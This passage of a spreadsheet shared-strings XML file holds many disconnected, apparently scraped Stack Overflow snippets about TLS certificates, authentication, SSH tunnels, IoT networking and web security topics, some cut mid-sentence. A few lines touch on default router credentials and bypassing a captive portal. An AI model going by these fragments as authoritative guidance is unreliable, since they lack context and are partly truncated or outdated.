iOS 12.1.1 requires that publicly-trusted Transport Layer Security (TLS) server authentication certificates issued after October 15, 2018 meet the Certificate Transparency policy to be evaluated as trusted on Apple platforms.</t>
  </si>
  <si>
    <t>A web service where a user (or client software)
presents some form of credentials (e.g., username/password), and if valid
the result is a 'security token' that can be used to access a web
application or web service.</t>
  </si>
  <si>
    <t>Over 5,000 companies use GeoIP data to locate their Internet visitors and show them relevant content and ads, perform analytics, enforce digital rights, and efficiently route Internet traffic.</t>
  </si>
  <si>
    <t>This version of Internet Explorer is widely derided for its security issues and lack of support for modern web standards, making frequent appearances in "worst tech products of all time" lists, with some publications labeling it as the "least secure software on the planet."</t>
  </si>
  <si>
    <t>The official channel would be to register for a 'Private Enterprise Number' via this link:
http://pen.iana.org/pen/PenApplication.page
After the approval process, you'll receive an OID which you can further branch out and create entire sub-trees of OIDs.</t>
  </si>
  <si>
    <t>2- you can mix Java/c# with php by making a small web application to link the server hardware serials (like hdd / motherboard serial / available mac address / Operating system installation date) in encrypted hidden place to prevent stalling your files to run on another machines.</t>
  </si>
  <si>
    <t>Regarding the remote monitoring question:  yes this will work although i want to point out that the event hubs SDK for Node is still preview (and might change a bit in the future) so you should expect some quirks.</t>
  </si>
  <si>
    <t>Examples
bash --login
ssh user@host
When bash starts as a login shell the following files are executed in this order:
/etc/profile
~/.bash_profile
~/.bash_login
~/.profile
Setting up a bash_profile
Reload bash_profile after making changes
Syntax
The following characters can be used in defining PS1 and PS2.</t>
  </si>
  <si>
    <t>Bicycle-related ideas:
theft alarm (perhaps with radio link to a base station which is connected to a PC by Ethernet)
fancy trip computer (with reed switch or opto sensor on wheel)
integrate with a GPS telematics unit (trip logging) with Ethernet/USB download of logged data to PC.</t>
  </si>
  <si>
    <t>It would be best if this content could be migrated (with redirects) to an archive outside of Stack Overflow, but until such an option is provided we must make use of what exists:
Some of the most popular old questions manage to get undeleted and locked, but too few.</t>
  </si>
  <si>
    <t>Running dnsmasq with debug switches returns:
Run command:
Config File:
domain-needed
bogus-priv
address=/double-click.net/127.0.0.1
interface=wlan0
dhcp-range=192.168.69.33,192.168.69.254,12h
What am I missing that the Android wants?</t>
  </si>
  <si>
    <t>Documentation is provided by Apache covering installation and setup for httpd 2.0 and 2.2
This tag should be used for questions around using mod_ssl in your application, extending it, controlling the state from your application, writing other Apache modules that talk to it and similar.</t>
  </si>
  <si>
    <t>It supports the specification, analysis, design, verification and validation of a broad range of systems and systems-of-systems.SysML is defined as an extension of a subset of the Unified Modeling Language (UML) using UML's profile mechanism.</t>
  </si>
  <si>
    <t>The sources https://raspberrypi.stackexchange.com/questions/84703/qcamera-get-error-mesa-loader-failed-to-retrieve-device-information and https://github.com/RPi-Distro/repo/issues/89 suggested to update the libdrm.</t>
  </si>
  <si>
    <t>Try following:
Switch to root and run the program you created
If that helps do following
 then log out and log in from all terminals and GUIs</t>
  </si>
  <si>
    <t>and also at the access() linux documentation, it states:
access() may not work correctly on NFS file systems with UID mapping enabled, because UID mapping is done on the server and hidden from the client, which checks permissions.</t>
  </si>
  <si>
    <t>CMA is a technology within the Java Servlet Specification that takes care of authentication and role-based access to pages or sections of the web-app as specified by URL patterns.</t>
  </si>
  <si>
    <t>This tag is used for questions about or involving the StringTokenizer class in Java, which is used to break a single string into multiple, individual "tokens".</t>
  </si>
  <si>
    <t>But when i try to run it inside corporate proxy, I see that iot doesn't honor the proxy and instead tries to connect to aws directly and is getting rejected by the firewall.</t>
  </si>
  <si>
    <t>This tag should be used with questions about using, debugging, optimizing, or otherwise involving hashcat, a password recovery tool.</t>
  </si>
  <si>
    <t>If you're trying to authenticate on an installed or console app, you need to use  as the redirect_uri GET param in when you redirect the user to the login/authorization page.</t>
  </si>
  <si>
    <t>must be async-signal-safe:
Error checking and handling potential spurious wakeups from sem_wait() aren't included.</t>
  </si>
  <si>
    <t>Remember: not indexing an IP address is not an security improvement: botnets which are trying to attack users don't care about dns, but ip.</t>
  </si>
  <si>
    <t>Letsencrypt (and any other service that provides certificates) needs to verify the ownership of the domain in order to deploy a certificate.</t>
  </si>
  <si>
    <t>Web security is the broad term given to practices used to improve application security over the internet.</t>
  </si>
  <si>
    <t>BarTender barcode software is design-and-print software for labels, barcodes, cards and RFID tags.</t>
  </si>
  <si>
    <t>A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions.</t>
  </si>
  <si>
    <t>Version 1: This version refers to cookies as defined in RFC 2965, HTTP State Management Mechanism.</t>
  </si>
  <si>
    <t>This particular hotspot has a captive portal and I want to have the Yun, process the "Accept" button that comes up on the web page after connecting to the hotspot.</t>
  </si>
  <si>
    <t>I have been reading that a reverse ssh connection is the best way to achieve this since it is safe.</t>
  </si>
  <si>
    <t>The PI is connected to the internet but I am not sure if this is some Proxy or firewall problem or if I am not using linphone properly.</t>
  </si>
  <si>
    <t>This is a homegrown security system - when the door is opened, I want the Arduino to check a PHP page which returns "armed" if the system has been armed.</t>
  </si>
  <si>
    <t>or it is because of apache restricting to open page with public IP or not allowing to open over internet.</t>
  </si>
  <si>
    <t>EDIT2:
My scripts starts after reboot of RPi, with root privileges.</t>
  </si>
  <si>
    <t>dmesg i have  linked 
dmesg link
It seems that i need to register  in platform also .. 
How probe gets called in i2c ... ?</t>
  </si>
  <si>
    <t>it seems like that the login box is writing in Riot.js ,  I just can't find the username element in html, how can I automaticlly fill username using selenium ?</t>
  </si>
  <si>
    <t>I read some reviews saying that this library is not reliable however I would first want to check my code before really suspecting anything else.</t>
  </si>
  <si>
    <t>The web server even successfully tried to reach out to the mysql server to find a user when using the login system.</t>
  </si>
  <si>
    <t>The reason why I don't want to use a cronjob is because editing a cronjob from an apache web server causes permission problems and it makes my pi somewhat vulnerable to the outside world.</t>
  </si>
  <si>
    <t>For a leaf certificate, can CN be any valid common name identifier, or it should contain more details like root CA name etc.?</t>
  </si>
  <si>
    <t>This page with project is protected by conditions - user must by logged and only one user can use this page in one time.</t>
  </si>
  <si>
    <t>It uses this credentials file (.smbcredentials):
username=Administrator
password=[REDACTED]
domain=AASERVER-1
I am unclear what "domain" means in this context.</t>
  </si>
  <si>
    <t>Moreover, when I encrypt it on my PHP server I get this: 
T1YNYC4P4R2Y5eCxUqtjuw==
My esp32 sketch looks like this:
My PHP code looks like this:
require_once('xxtea.php');
$str = "HELLO WORLD"
$key = "ENCRYPTION KEY";
$encrypt_data = xxtea_encrypt($str, $key);
error_log($encrypt_data);
Is there a way to have an encrypted strings communication between PHP and esp32?</t>
  </si>
  <si>
    <t>I've tried elevating my privileges by granting my docker container USER sudo but I believe this is occurring because the docker container isn't truly being run with privileged settings.</t>
  </si>
  <si>
    <t>2) MIFARE Classic tags used as NDEF tags are typically not writable with the public key A but (if at all) only with the secret key B.</t>
  </si>
  <si>
    <t>Quickstart (which is completely unauthenticated, was intended to do what it says on the tin) doesn't include the ability to send commands to devices.</t>
  </si>
  <si>
    <t>Even if you could start the application to run as root from within a non-root QtCreator context, you would not be able to connect to the running process and debug it.</t>
  </si>
  <si>
    <t>Once logged in to the shell use the commands provided on this link to install open cv and python.</t>
  </si>
  <si>
    <t>Your  tag doesn't have a "name" defined, so it's not being sent:
It is:
And should be:
Your code has some glaring security problems, but those lay beyond the scope of your question.</t>
  </si>
  <si>
    <t>As one of the other posters mentions, you should really cleanse your input to prevent security exploits (and drop the shell=true).</t>
  </si>
  <si>
    <t>Visiting the website, I see that your certificate is valid, but also only 3-4 days old, which is a small enough margin of error for many issues like this.</t>
  </si>
  <si>
    <t>You need a way to generate a unique id, this question on the Arduino site has some hints on how to do this.</t>
  </si>
  <si>
    <t>Moreover, a good TCP/IP link will have code about it, for reliability, which HTTP provides for free.</t>
  </si>
  <si>
    <t>Make sure you enable security this time - details in the post linked above.</t>
  </si>
  <si>
    <t>You can also typically (as the owner or as root) write to the pty devices for GUI-mode terminals, ssh sessions, etc.</t>
  </si>
  <si>
    <t>But to learn the language correctly and completely always keep an eye on authentic sources like cppreference.com and/or cplusplus.com.</t>
  </si>
  <si>
    <t>For questions about checking HTML documents for conformance errors, use the [w3c-validation] tag instead.</t>
  </si>
  <si>
    <t>A question with this tag is about non-public (aka private) iOS APIs.</t>
  </si>
  <si>
    <t>Libksba is a library to make the tasks of working with X.509 certificates, CMS data and related objects more easy</t>
  </si>
  <si>
    <t>The Linked Movie Database (LinkedMDB) is a database of movie-related information exposed in RDF which can be queried using SPARQL.</t>
  </si>
  <si>
    <t>Undertow is a high performance non-blocking webserver that is the new web server in Red Hat's WildFly.</t>
  </si>
  <si>
    <t>This tag may also refer to the mechanisms to claim the authorship of a content, like the `@author` tag in JavaDoc or C#.</t>
  </si>
  <si>
    <t>For questions relating to the integration with Auth0 services and/or SDK's.</t>
  </si>
  <si>
    <t>This allows consumers to store and then subsequently send cookies with XHR requests that use cookies for authentication for example.</t>
  </si>
  <si>
    <t>For questions relating to user groups, in a security or permissions context, independent of platform.</t>
  </si>
  <si>
    <t>Use with any  relevant language, project type and specific security tags.</t>
  </si>
  <si>
    <t>For questions related to the programming aspect of  security in cloud computing.</t>
  </si>
  <si>
    <t>This tag refers to the pxssh python library - used for creating and using SSH via a python script.</t>
  </si>
  <si>
    <t>Trusty is a software implementation that supports a Trusted Execution Environment.</t>
  </si>
  <si>
    <t>siteminder is an application sold by Computer Associates that allows web assets to require authentication before access is given.</t>
  </si>
  <si>
    <t>Questions relating to Nmap, a free and open-source utility for network exploration or security auditing.</t>
  </si>
  <si>
    <t>Libksba is a library to make the tasks of working with X.509 certificates, CMS data and related objects more easy.</t>
  </si>
  <si>
    <t>CookieManager.put uses CookiePolicy.shouldAccept to decide whether to put some cookies into a cookie store.</t>
  </si>
  <si>
    <t>This tag deals with the generation of barcodes on print media.</t>
  </si>
  <si>
    <t>If the remote host is malicious, it is possible to spy on local users session.</t>
  </si>
  <si>
    <t>Evidence by proper signature or seal that a document is genuine and official.</t>
  </si>
  <si>
    <t>A good reference is the wikipedia page for capability based security.</t>
  </si>
  <si>
    <t>2Checkout offers 8 payment methods:
Visa
MasterCard
Discover
American Express
Diners
JCB
PIN debit cards with the Visa or MasterCard logo
Debit cards with the Visa or MasterCard logo
PayPal
Some of these options are only available in select currencies.</t>
  </si>
  <si>
    <t>DO NOT USE THESE FUNCTIONS: they are deprecated for security reasons, and since C11 gets has been removed from the C standard library.</t>
  </si>
  <si>
    <t>Flashblock provides a mechanism that allows users to display the blocked elements by clicking on them, or by whitelisting.</t>
  </si>
  <si>
    <t>A proxy/firewall web-publishing solution in one package.</t>
  </si>
  <si>
    <t>Server Side Request Forgery (SSRF) is a vulnerability that appears when an attacker has the ability to create requests from the vulnerable server.</t>
  </si>
  <si>
    <t>The actual mechanism used to
store passwords is left up to the implementation.</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.</t>
  </si>
  <si>
    <t>Hyper is a fast, safe HTTP implementation written in and for Rust.</t>
  </si>
  <si>
    <t>It's official description is:
Access other computers or allow another user to access your computer securely over the Internet.</t>
  </si>
  <si>
    <t>If a malicious client is suspected, use the address in sqlnet.log to identify the source and restrict access.</t>
  </si>
  <si>
    <t>See Also
Best way to prevent SQL Injection in PHP
http://bobby-tables.com/php.html
My special characters come out all screwed up.</t>
  </si>
  <si>
    <t>For more information about these terms, please visit the OpenID website and read the OAuth2 specification.</t>
  </si>
  <si>
    <t>Spam in e-mail started to become a problem when the Internet was opened up to the general public in the mid-1990s.</t>
  </si>
  <si>
    <t>Important Note
HttpOnly just makes exploiting XSS vulnerabilities a little more difficult.</t>
  </si>
  <si>
    <t>For questions related to the programming aspect of security in cloud-computing.</t>
  </si>
  <si>
    <t>And it included a way to check and edit the cookies a website sets.</t>
  </si>
  <si>
    <t>The list acts as a starting point for web applications to harden themselves against attack.</t>
  </si>
  <si>
    <t>Vault API
The Vault API lets you manage:
Matterseach matter is a container for all of the data related to a specific case or investigation.</t>
  </si>
  <si>
    <t>Official sites for:
Kubernetes Engine
Google Cloud VPN
Virtual Private Cloud</t>
  </si>
  <si>
    <t>Secure: Twig has a sandbox mode to evaluate untrusted template code.</t>
  </si>
  <si>
    <t>With explicit personalization, the web page (or information system) is changed by the user using the features provided by the system.</t>
  </si>
  <si>
    <t>That means once you've generated enough reputation, we trust you to edit anything in the system without it going through the peer review system.</t>
  </si>
  <si>
    <t>When I enable web ui on my router, there is some basic security settings that I need to check?</t>
  </si>
  <si>
    <t>I wrote some code in C++ that relied on the cryptopp library, specifically version 5.6.2.</t>
  </si>
  <si>
    <t>With sudo php /var/www/img.php?pic I'll get an error:
Could not read input file: /var/www/img.php
First I thought it's a problem with the permissions, but isn't working even with root privileges.</t>
  </si>
  <si>
    <t>As described by many other users before, the .JSON file for the connection details I have to hand to Spyder, is located at /home/&lt;username&gt;/.ipython/profile_default/security/kernel-&lt;id&gt;.json.</t>
  </si>
  <si>
    <t>Disclaimer: This is intended only for academic purposes, I do not want a "hacky" solution.</t>
  </si>
  <si>
    <t>The problem is when I POST the authentication data, I find in my server logs that even the authentication is done correctly,  the session closed.</t>
  </si>
  <si>
    <t>Let's say I have an admin page with data that hides on load and shows when the admin logs in.</t>
  </si>
  <si>
    <t>I want some way to have full access to the Device Portal currently on port 8080 without it being publicly exposed.</t>
  </si>
  <si>
    <t>I found out what was causing the error, I used chown to give the permissions to the website's root folder but I should have used usermod.</t>
  </si>
  <si>
    <t>For higher level code, I recommend one version, a safe one.</t>
  </si>
  <si>
    <t>This creates the user root with the password my-password which you can then add to the WordPress configuration.</t>
  </si>
  <si>
    <t>Eventually there were some problems with that approach too: some of the libraries were signed.</t>
  </si>
  <si>
    <t>Questions regarding ASP.NET identity authentication methods</t>
  </si>
  <si>
    <t>For questions regarding the JavaScript `confirm` function or other such functions that ask the user for yes/no confirmation.</t>
  </si>
  <si>
    <t>A programming interface for intercepting input device communication.</t>
  </si>
  <si>
    <t>Library for writing type-safe GraphQL services in Haskell</t>
  </si>
  <si>
    <t>Questions about the Java Port/Wrapper of the Pairing-Based Cryptography Library</t>
  </si>
  <si>
    <t>To log out is to close off one's access to a computer system after having previously logged in.</t>
  </si>
  <si>
    <t>The Crypto API was first introduced in Windows NT 4.0 and enhanced in subsequent versions.</t>
  </si>
  <si>
    <t>Links
Keycloak Homepage
Github
Features
SSO and Single Log Out for browser applications
Social Broker.</t>
  </si>
  <si>
    <t>These vulnerabilities are selected based on a combination of frequency, exploitability and severity.</t>
  </si>
  <si>
    <t>Further details can be found in Wikipedia's article about signed zero.</t>
  </si>
  <si>
    <t>The biggest difference in my opinion between moderators and users, beyond access to special privileges, is accountability.</t>
  </si>
  <si>
    <t>This link help a bit to understand the basics of SSL security.</t>
  </si>
  <si>
    <t>But the jira login page does not seam to accept logins using the GET method.</t>
  </si>
  <si>
    <t>No one is logging in to the server, I saw rc.local as a solution but I think it only works by logging in?</t>
  </si>
  <si>
    <t>Two noteworthy examples are:
wiringPi library provides a cli command gpio to be used by non-privileged users for direct access.</t>
  </si>
  <si>
    <t>If you need to run your program as user root, then you must impersonate root.</t>
  </si>
  <si>
    <t>PAW Server implements the filtering HTTP Proxy for PAW.</t>
  </si>
  <si>
    <t>But you can configure the sandbox to choose exactly which features are
allowed or not, eg.</t>
  </si>
  <si>
    <t>browserid from mozilla is a distributed web identity and login system.</t>
  </si>
  <si>
    <t>There will be documented ways to do so in any reasonable crypto library.</t>
  </si>
  <si>
    <t>Deprecation
ClientLogin has been officially deprecated since April 20, 2012
  and is now no longer available.</t>
  </si>
  <si>
    <t>For more information specific to ruby hash, see the documentation here.</t>
  </si>
  <si>
    <t>There have been numerous reports of data in transit being intercepted in recent years.</t>
  </si>
  <si>
    <t>As an elected community moderator, I will do my best to keep Stack Overflow reputable.</t>
  </si>
  <si>
    <t>I can ssh and sftp to the Pi, and can access RaspBMC's web interface, from both devices, with no problems.</t>
  </si>
  <si>
    <t>The Pi runs Windows 10 Core IoT and I can connect to it via SSH and the web interface with no problem.</t>
  </si>
  <si>
    <t>I'm trying, with 0 success to bypass the captive portal on iOS.</t>
  </si>
  <si>
    <t>Django OAuth 2.0 Server App module that helps Django site operators provide an OAuth 2.0 interface.</t>
  </si>
  <si>
    <t>Browser API implementing the Web Authentication standard.</t>
  </si>
  <si>
    <t>Having looked into it there does not seem to be a pycrypto version for python3 at the moment.</t>
  </si>
  <si>
    <t>coldfusion runs the code in this tag if a user is not already logged in.</t>
  </si>
  <si>
    <t>":"Validation, Version=2.2.0.0, Culture=neutral, PublicKeyToken=2fc06f0d701809a7"} 
I have also noticed the following in the app.config file:
I am using version 10.0.20 of the C# SDK
My project is targeting .NET 4.5.1
The Validation package installed is version 2.2.8
Can anyone provide some pointers about what is going wrong in the use of the SDK?</t>
  </si>
  <si>
    <t>Please refer to this table which lists the minimum platform versions that support each .NET Standard version.In addition, you need to add the capabilities(internetClient ,privateNetworkClientServer) to the app so that the app can receive incoming data from internet or LAN.</t>
  </si>
  <si>
    <t>When trying to send data using the  method, the application crashes with the following exception:
{"Could not load file or assembly 'Validation, Version=2.2.0.0, Culture=neutral, PublicKeyToken=2fc06f0d701809a7' or one of its dependencies.</t>
  </si>
  <si>
    <t>The idea is:
Connect arduino to PC via USB port (Windows 7, administrator logged
in) 
System automatically execute command (for example: shutdown -s
-t 3600)
Is it possible to make that without using proxy application on host?</t>
  </si>
  <si>
    <t>Google Web Components is a set of pre-made web components specifically made for Google services such as maps and Oauth.</t>
  </si>
  <si>
    <t>The Domain Name System Security Extensions (DNSSEC) is a suite of specifications for securing certain kinds of information provided by the Domain Name System (DNS).</t>
  </si>
  <si>
    <t>When I use the mod_rewrite and mod_ssl concurrently below, the resulting domain is: https://www.domain.com// I find this extra '/' annoying and I would like to get rid of it.</t>
  </si>
  <si>
    <t>Even a simple bool flag will not work because of the normal read-modify-write is not multi-core safe.</t>
  </si>
  <si>
    <t>The way a device on a 3G network communicates with other servers on the network is generally via NAT devices which translate the 3G 'internal' IP address to an externally valid internet IP address.</t>
  </si>
  <si>
    <t>I use mosquitto-auth-plug to manage user access with a mysql database set up on the same machine
when you think about it the operating system is free, mosquitto broker is free, and mysql server is free.</t>
  </si>
  <si>
    <t>The words "private API" in a question doesn't automatically make it suitable for this tag.</t>
  </si>
  <si>
    <t>The problem arises when I try to add basic HTTP authentication to the Arduino web server.</t>
  </si>
  <si>
    <t>I'm creating network service on a MKR1000, and want to use .beginAP() to make it an access point, so I don't need a "middle man" (router).</t>
  </si>
  <si>
    <t>The goal is to open a web browser in my home network from a from a remote location with ssh tunnelling.</t>
  </si>
  <si>
    <t>I am using java to read from a webpage using this code:
When I run the code with eclipse on my windows pc it works fine, but when I try to run it on my raspberry pi, I get this error:
I think it means java doesnt trust the website, but I cant find a solution anywhere.</t>
  </si>
  <si>
    <t>When I put the sd card in my pi, the app runs, but I don't get the chance to input the wifi connection details.</t>
  </si>
  <si>
    <t>The RPi.GPIO Python library now supports Events, which are explained in the Interrupts and Edge detection paragraph.</t>
  </si>
  <si>
    <t>Alternatively you could specify a specific table
You'd probably want to firm up the security by only granting relevant privileges, but that should be enough to test that it works
That should hopefully do it!</t>
  </si>
  <si>
    <t>You can make use of reverse remote ssh method mentioned in this link.</t>
  </si>
  <si>
    <t>You'll be able to tell good IP's from the bad ones
Some reading on encryption for arduinos:
https://electronics.stackexchange.com/questions/355/encryption-libraruy-for-arduino</t>
  </si>
  <si>
    <t>The cookie shall also have an expiration time, disallowing reusing a captured cookie by an attacker later on.</t>
  </si>
  <si>
    <t>You maybe tempted to think that you work in an environment where strong crypto is not needed, I say then no crypto is needed at all, save yourself a lot of debug.</t>
  </si>
  <si>
    <t>If you want to prevent your users from seeing that is being posted to the RasPi and from tampering with it, you'll need to send that data from the server, not from user's browsers.</t>
  </si>
  <si>
    <t>Try accessing your router settings usually through the web browser at: 
http://192.168.0.1/
Assuming you have never accessed this the username is usually admin, and the password is password.</t>
  </si>
  <si>
    <t>I just got feeling that Vodafone checks http-packet headers and if there is something that they think suspicious, they redirect them.</t>
  </si>
  <si>
    <t>Here's my ATWINC1500 Arduino AVR implementation of reading from IoT Hub (amend the endpoint and change to a POST):
I just used Device Explorer to generate a 2-year valid SAS key.</t>
  </si>
  <si>
    <t>Maybe you could read the registry hardware keys to locate candidates, depending on what level of access your program has.</t>
  </si>
  <si>
    <t>In my case worked combination "Alt" + "F4", it stops the current session and opens the login screen</t>
  </si>
  <si>
    <t>Everything goes through an Internet-based service and expects to communicate with devices via a server-based proxy.</t>
  </si>
  <si>
    <t>(The details of how to ensure CFLAGS is part of your compile rule is way beyond the scope of this question).</t>
  </si>
  <si>
    <t>ModSecurity is an open source, cross-platform web application firewall (WAF) module.</t>
  </si>
  <si>
    <t>Certificate Transparency would help by making it impossible for a certificate to be issued for a domain without the domain owner knowing.</t>
  </si>
  <si>
    <t>Use this tag for technical questions such as scripting issues, form behavior, etc.</t>
  </si>
  <si>
    <t>Use with any relevant language, technology, project type or specific security tags.</t>
  </si>
  <si>
    <t>Recently, collisions have been detected, meaning that SHA1 is becoming more vulnerable to attacks, and its use for protecting data is not recommended.</t>
  </si>
  <si>
    <t>A blockchain module designed to create a user-friendly web application that can explore all relevant information stored in the ledger.</t>
  </si>
  <si>
    <t>It contains helpers to pass data to untrusted environments and to get it back safe and sound.</t>
  </si>
  <si>
    <t>The intended use of Spin is to verify fractions of process behavior, that for one reason or another are considered suspect.</t>
  </si>
  <si>
    <t>Extended Protection is a feature in Windows 7 and Windows 2008 R2 that prevents certain MITM attacks.</t>
  </si>
  <si>
    <t>AdBlockers are the range of tools aimed to remove advertisements from web-pages.</t>
  </si>
  <si>
    <t>This identifier is consistent, enabling the third-party site to recognize the user across multiple sessions.</t>
  </si>
  <si>
    <t>The encryption strategy can thus be part of the
database design and can be related with data sensitivity and/or user privileges.</t>
  </si>
  <si>
    <t>JavaScript injection is a process by which we can insert and use our own JavaScript code in a page, either by entering the code into the address bar, or by finding an XSS vulnerability in a website.</t>
  </si>
  <si>
    <t>You can then audit your code (a simple grep would do) to ensure that this is only done for those values that you can easily tell are safe - because they were received from your server, sanitized by your library, etc.</t>
  </si>
  <si>
    <t>Please refer to the Wikipedia for details about comparing RBAC with other more traditional access control schemes.</t>
  </si>
  <si>
    <t>The API has methods to get a person's profile, search through profiles, and list all of the people who have +1'd or reshared a particular activity.</t>
  </si>
  <si>
    <t>It claims to block website trackers and remove intrusive Internet advertisements.</t>
  </si>
  <si>
    <t>Brave claims to block website trackers and remove intrusive Internet advertisements.</t>
  </si>
  <si>
    <t>Use the debugging facilities of the VM to get way better information than the usual "it locks up" you will experience with buggy privileged code.</t>
  </si>
  <si>
    <t>Unlike other projects, it does not depend on using any existing proprietary libraries and does not require jailbreaking.</t>
  </si>
  <si>
    <t>Unlike
  email, enterprise messaging systems provide guaranteed delivery,
  speed, security, and freedom from spam.</t>
  </si>
  <si>
    <t>Nessus features high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture.</t>
  </si>
  <si>
    <t>The table exists in the MySQL database, and I am using the 'root' user, which has the right user privilege.</t>
  </si>
  <si>
    <t>It should be normal I suppose, as I am not log with grant tables I have no access to user informations and privileges.</t>
  </si>
  <si>
    <t>#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.</t>
  </si>
  <si>
    <t>A ssh window will open, just leave it open (minimize it..), that is your reverse tunnel.</t>
  </si>
  <si>
    <t>In general, again for security reasons, even the processes spawned from init are not allowed to run as root and are given isolated SE contexts to run in.</t>
  </si>
  <si>
    <t>For a leaf certificate, can CN be any valid common name identifier,
  or it should contain more details like root CA name etc.?</t>
  </si>
  <si>
    <t>You can confirm that by inheriting QLabel like this :
The "LABEL DELETED" message will be logged when the QDialog is instanced.</t>
  </si>
  <si>
    <t>Root certificate on device
While establishing a secure TLS connection with IoT Hub, the IoT device authenticates IoT Hub using a root certificate that is part of the device SDK.</t>
  </si>
  <si>
    <t>The utility can copy, move, delete, or verify the existence of a package</t>
  </si>
  <si>
    <t>It does not depend on using any existing proprietary libraries and does not require jailbreaking</t>
  </si>
  <si>
    <t>As of 2009, GNU arch's official status is deprecation, and only security fixes are applied.</t>
  </si>
  <si>
    <t>The problem with this method is as far as I can tell there is no way an IOS app can use public apple interfaces to connect to a specific WIFI in code - in this case the one run by raspberry.</t>
  </si>
  <si>
    <t>Now that we've gotten that out of the way, I have a few questions, some for the furthering of this project, and some just to satiate my curiosity:
~Is there some reason that logging in to a user would call chmod?</t>
  </si>
  <si>
    <t>I am able to log in the API store and publisher but when I tries to log in the devicemgt web console.</t>
  </si>
  <si>
    <t>I am able to sign in a Cognito user and connect to AWS IoT, but I am having difficulty logging out and preventing access to IoT.</t>
  </si>
  <si>
    <t>What Ive did so far
Logged in as root user
Granted all rights at the .py file in the Finder to anybody and chmodded the file to 777
Edited both sudo crontab -e and crontab -e files and I did edit the /etc/crontab file (they are three different files(?!)).</t>
  </si>
  <si>
    <t>I believe this to be Security Policy related...
Lastly.. where I can I view some sort of 'logs' on this?</t>
  </si>
  <si>
    <t>A good solution is then to delete the CMakeCache, or even the whole build dir to be safe.</t>
  </si>
  <si>
    <t>Double click on it and either delete it or correct the credentials.</t>
  </si>
  <si>
    <t>The ESP8266 Arduino project introduced verifying with root CA certificates which is heaps better than using fingerprints.</t>
  </si>
  <si>
    <t>New regions launched after May, 2018 serve Amazon Trust Services signed certificates only.</t>
  </si>
  <si>
    <t>Something like this:
This will allow the python app to connect to X. but remember this will fail if the pi user is not logged in at the time.</t>
  </si>
  <si>
    <t>All new cookies are deleted after you close all incognito windows that you've opened.</t>
  </si>
  <si>
    <t>Web applications manage user interactions, state, security, and performance.</t>
  </si>
  <si>
    <t>Note that logged addresses may not be reliable as they can be forged (e.g.</t>
  </si>
  <si>
    <t>I am trying to make my c code safe from stack overflows on my Raspberry Pi.</t>
  </si>
  <si>
    <t>It seems that this function System.Web.Security.MachineKey::Protect() is not implemented in mono.</t>
  </si>
  <si>
    <t>So the controller will be a virtual one served from a secure website.</t>
  </si>
  <si>
    <t>I did read the datasheet (https://www.espressif.com/sites/default/files/documentation/0a-esp8266ex_datasheet_en.pdf), and them says that existis the methods of encrypt: WEP/TKIP/AES.</t>
  </si>
  <si>
    <t>A privilege of the Android mobile operating system that allows use to run privileged control (or "root access") within Android's subsystem.</t>
  </si>
  <si>
    <t>Hotkeys provide quick access to user interface application or system actions via combinatorial key presses.</t>
  </si>
  <si>
    <t>Further Reading
Documentation
Guarding against SQL Injection</t>
  </si>
  <si>
    <t>The view code is free to assume the user is logged in.</t>
  </si>
  <si>
    <t>Runtime permissions for Android were introduced in version 6.0 Marshmallow (API level 23).</t>
  </si>
  <si>
    <t>The Community Edition provides no support for authentication and has some limitations on "durable deletes".</t>
  </si>
  <si>
    <t>Remember that I never uploaded a certificate to the Wemos D1 or implemented a certificate into the code, and still it can connect.</t>
  </si>
  <si>
    <t>The answer I am offering myself is to delete the password for the git user
And thereby disabling log-in.</t>
  </si>
  <si>
    <t>These server-to-server interactions do
  not involve a user, and only your application needs to authenticate
  itself.</t>
  </si>
  <si>
    <t>It is not a matter of "spoofing", the interface can be implemented in many ways.</t>
  </si>
  <si>
    <t>disclaimer, you are exposing your PI to the internet</t>
  </si>
  <si>
    <t>To be used along the java and radius tags, only if you are specifically using this library to authenticate to a RADIUS server.</t>
  </si>
  <si>
    <t>Note that a device can implement more than one profile.</t>
  </si>
  <si>
    <t>It uses an obsolete and vulnerable version of Inno Setup.</t>
  </si>
  <si>
    <t>Thus, you cannot login as root.</t>
  </si>
  <si>
    <t>The official documentation for protocols in swift is located here.</t>
  </si>
  <si>
    <t>In the  addressing architecture, a private network is a network that uses private IP address space, following the standards set by RFC 1918 for Internet Protocol Version 4 (IPv4), and RFC 4193 for Internet Protocol Version 6 (IPv6).</t>
  </si>
  <si>
    <t>1. via ssh, osx/linux only
Useful Links
SublimeREPL page at Package Control, Sublime's package manager
SublimeREPL project on github
Issues tracker
Documentation (somewhat incomplete)</t>
  </si>
  <si>
    <t>The new code would look like this:
Important: please note you should not try to open a GUI enabled application with sudo or root privileges, as this can have bad consequences, such as modifying permissions and ownership on program files, which could lead to malfunctioning.</t>
  </si>
  <si>
    <t>Documentation, Announcements, Issue Tracker
Ruby Programming Language
Official Issue tracker
Ruby Doc, Ruby Core API Documentation
Ruby Doc, Ruby Standard Library API Documentation
Security announcements for Ruby, Rails, RubyGems, Bundler, and more
Unofficial Reference
Ruby on Wikipedia
Ruby Wikibook
Why's (Poignant) Guide to Ruby
Implementations, Installers
Ruby version managers.</t>
  </si>
  <si>
    <t>What i see every day are bots which make dictionary attacks on ssh and common vulnerabilities checks on 80 and 8080 ports.</t>
  </si>
  <si>
    <t>A document is locked at editing time to prevent two people from making conflicting simultaneous edits.</t>
  </si>
  <si>
    <t>Once when BLE profile, running on embedded device is known, connection and communication over BLE is very simple using CoreBluetooth library.</t>
  </si>
  <si>
    <t>I found the link again:
http://www.python-exemplary.com/index_en.php?inhalt_links=navigation_en.inc.php&amp;inhalt_mitte=raspi/en/installation.inc.php
Also my permissions for the new file were incorrect as Geany sends the file to /home/pi/scripts and I log in as root and not the pi user.</t>
  </si>
  <si>
    <t>Amber is an open source web application framework written in Crystal, a compiled, type safe language.</t>
  </si>
  <si>
    <t>DoS attacks violate the acceptable use policies of virtually all Internet service providers (as well as official laws of certain nations).</t>
  </si>
  <si>
    <t>Spring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.</t>
  </si>
  <si>
    <t>Also, a bit further down the road, my plan is to create a web interface to control the pi, will i be able to have a javascript interface and send ssh commands to the pi via apache?</t>
  </si>
  <si>
